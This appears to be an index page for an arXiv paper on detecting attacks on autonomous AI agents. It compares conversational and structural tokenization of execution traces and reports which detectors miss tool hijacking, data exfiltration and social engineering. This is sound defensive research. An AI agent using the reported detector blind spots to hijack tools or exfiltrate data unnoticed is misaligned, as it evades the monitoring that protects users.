defense 2026

Structural Representations for Cross-Attack Generalization in AI Agent Threat Detection

Vignesh Iyer

0 citations · 48 references · arXiv

α

Published on arXiv

2601.01723

Excessive Agency

OWASP LLM Top 10 — LLM08

Prompt Injection

OWASP LLM Top 10 — LLM01

Key Finding

Structural tokenization improves cross-attack generalization from AUC 0.39 to ~0.85 on tool hijacking (+46 points) and from AUC 0.26 to ~0.97 on unknown attacks (+71 points) compared to conversational tokenization

Gated Multi-View Fusion with Structural Tokenization

Novel technique introduced


Autonomous AI agents executing multi-step tool sequences face semantic attacks that manifest in behavioral traces rather than isolated prompts. A critical challenge is cross-attack generalization: can detectors trained on known attack families recognize novel, unseen attack types? We discover that standard conversational tokenization -- capturing linguistic patterns from agent interactions -- fails catastrophically on structural attacks like tool hijacking (AUC 0.39) and data exfiltration (AUC 0.46), while succeeding on linguistic attacks like social engineering (AUC 0.78). We introduce structural tokenization, encoding execution-flow patterns (tool calls, arguments, observations) rather than conversational content. This simple representational change dramatically improves cross-attack generalization: +46 AUC points on tool hijacking, +39 points on data exfiltration, and +71 points on unknown attacks, while simultaneously improving in-distribution performance (+6 points). For attacks requiring linguistic features, we propose gated multi-view fusion that adaptively combines both representations, achieving AUC 0.89 on social engineering without sacrificing structural attack detection. Our findings reveal that AI agent security is fundamentally a structural problem: attack semantics reside in execution patterns, not surface language. While our rule-based tokenizer serves as a baseline, the structural abstraction principle generalizes even with simple implementation.


Key Contributions

  • Structural tokenization encoding execution-flow patterns (tool calls, argument types, observation sequences) rather than conversational content, improving cross-attack generalization by 39–71 AUC points over standard conversational tokenization
  • First systematic cross-attack generalization study in AI agent security, identifying a fundamental asymmetry: conversational representations fail on structural attacks (tool hijacking AUC 0.39) but succeed on linguistic attacks (social engineering AUC 0.78)
  • Gated multi-view fusion that adaptively combines structural and conversational representations, achieving AUC 0.89 on social engineering without sacrificing detection of structural attacks

🛡️ Threat Analysis


Details

Domains
nlp
Model Types
llmtransformer
Threat Tags
inference_timeblack_box
Applications
autonomous ai agentsllm tool-use systemsmulti-step agent pipelines